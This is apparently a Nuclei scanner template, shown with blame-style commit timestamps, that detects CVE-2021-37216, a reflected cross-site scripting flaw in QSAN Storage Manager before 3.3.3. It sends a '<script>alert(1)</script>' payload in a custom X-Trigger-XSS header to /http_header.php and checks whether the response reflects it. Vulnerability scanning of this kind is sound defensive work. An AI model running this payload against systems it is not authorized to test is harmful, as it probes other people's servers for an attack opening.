2021-08-03 14:31:33 +00:00
id : CVE-2021-37216
info :
2022-08-29 13:55:23 +00:00
name : QSAN Storage Manager <3.3.3 - Cross-Site Scripting
2021-08-03 14:31:33 +00:00
author : dwisiswant0
2022-04-22 10:38:41 +00:00
severity : medium
2021-08-03 14:31:33 +00:00
description : |
2022-08-29 13:55:23 +00:00
QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.
2022-04-22 10:38:41 +00:00
reference :
- https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-37216
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-37216
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00106
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,xss,qsan,storage
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-08-03 14:31:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-03 14:31:33 +00:00
- method : GET
path :
- "{{BaseURL}}/http_header.php"
headers :
X-Trigger-XSS : "<script>alert(1)</script>"
2021-08-03 14:44:14 +00:00
2021-08-03 14:31:33 +00:00
matchers-condition : and
matchers :
2021-08-03 14:44:14 +00:00
2021-08-03 14:31:33 +00:00
- type : word
part : body
words :
2021-08-03 14:44:14 +00:00
- '"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"'
2021-08-03 14:31:33 +00:00
- type : word
part : header
words :
- "text/html"
2021-08-03 14:44:14 +00:00
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- "!contains(tolower(header), 'x-xss-protection')"